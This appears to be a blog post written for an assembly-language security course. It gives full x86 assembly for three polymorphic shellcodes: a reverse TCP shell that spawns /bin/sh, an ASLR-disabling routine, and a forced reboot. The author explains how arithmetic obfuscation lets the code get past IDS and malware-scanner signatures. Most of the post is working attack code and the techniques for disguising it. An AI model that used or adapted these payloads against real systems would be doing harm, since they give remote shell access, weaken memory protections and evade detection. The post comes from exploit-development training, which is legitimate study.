SLAE Assignment #6 – Create polymorphic versions of 3 different shellcodes from shell-storm

Github link to files

For this assignment I chose three existing shellcodes and used some simple techniques to make polymorphic versions of them.

  1. Shell Reverse TCP by Julien Ahrens
  2. Linux x86 ASLR Deactivation by Jean Pascal Pereira
  3. Linux Hard Reboot by gunslinger

Shell Reverse TCP (polymorphic version)

Original size:  74 bytes
Polymorphic version:  90 bytes
global _start
section .text
    _start:
        push 0x66
        pop eax
        push 0x1
        pop ebx
        xor edx, edx
        push edx
        push ebx
        push 0x2
        mov ecx, esp
        int 0x80
        xchg edx, eax
        mov al, 0x66
        push 0x101017f
        push word 0x3905
        inc ebx
        push bx
        mov ecx, esp
        push 0x10
        push ecx
        push edx
        mov ecx, esp
        inc ebx
        int 0x80
        push 0x2
        pop ecx
        xchg edx, ebx
     loop:
        mov al, 0x3f
        int 0x80
        dec ecx
        jns loop
        mov al, 0xb
        inc ecx
        mov edx, ecx
        push edx
        mov esi, 0x3B9ACA01
        mov ebx, 0xA40DF930
        sub ebx, esi
        push ebx
        mov esi, 0x3B9ACA04
        mov ebx, 0xAA042C33
        sub ebx, esi
        push ebx
        mov ebx, esp
        int 0x80

Instead of pushing the direct hex values for the shellcode onto the stack (which may be fingerprinted by IDS systems and malware scanners), the shellcode values are put onto the stack indirectly by result of the subtraction done by the SUB instruction.

Linux x86 ASLR Deactivation

Original size:  83 bytes
Polymorphic version:  104 bytes
global _start
section .text
    _start:
        xor eax, eax
        push eax
        mov eax, 0x65636170
        push eax
        add eax, 0x1F0D1117  
        sub eax, 0x11111111
        push eax
        sub eax, 0x13F9E70D
        push eax
        add eax, 0xE09EA05
        push eax
        sub eax, 0xBFD3502
        push eax
        add eax, 0x3FC42F9
        push eax
        add eax, 0x5C10114
        push eax
        add eax, 0x7FFEFF6
        push eax
        sub eax, 0x11D04551   
        add eax, 0x11111111
        push eax
        mov ebx, esp
        mov cx, 0x2bc
        xor eax, eax
        mov al, 0x8
        int 0x80
        mov ebx, eax
        push eax
        mov dx, 0x3a30
        push dx
        mov ecx, esp
        xor edx, edx
        inc edx
        mov al, 0x4
        int 0x80
        mov al, 0x6
        int 0x80
        inc eax
        int 0x80

I used a similar technique to make this simple polymorphic version as I did in the last shellcode, but in this case, I used a combination of ADD and SUB instructions to keep changing the value in the EAX register and then when the result of the calculation resulted in the shellcode bytes that were needed, I added a PUSH instruction.

Linux Hard Reboot

Original size:  33 bytes
Polymorphic version:  45 bytes
global _start
section .text
    _start:
        mov al, 0x24
        int 0x80
        xor eax, eax
        mov al, 0x58
        mov ebx, 0xdeadbeef
        xor ebx, 0x204C6042
        mov ecx, 0x14256783
        add ecx, 0x13ECB1E6
        mov edx, 0x1234567
        int 0x80
        xor eax, eax
        mov al, 0x1
        xor ebx, ebx
        int 0x80

For the polymorphic version of this shellcode, I used a combination of XOR and ADD instructions to get the values in the EBX and ECX registers that were needed without writing the values directly.

The value needed in the EBX register is 0xfee1dead.  To get that value, I wrote 0xdeadbeef to EBX, and then XOR’ed it with 0x204c6042.

The value needed in the ECX register is 0x28121969.  To achieve that value I wrote 0x14256783 to ECX and then added 0x13ecb1e6 to it.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID:  SLAE-860

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s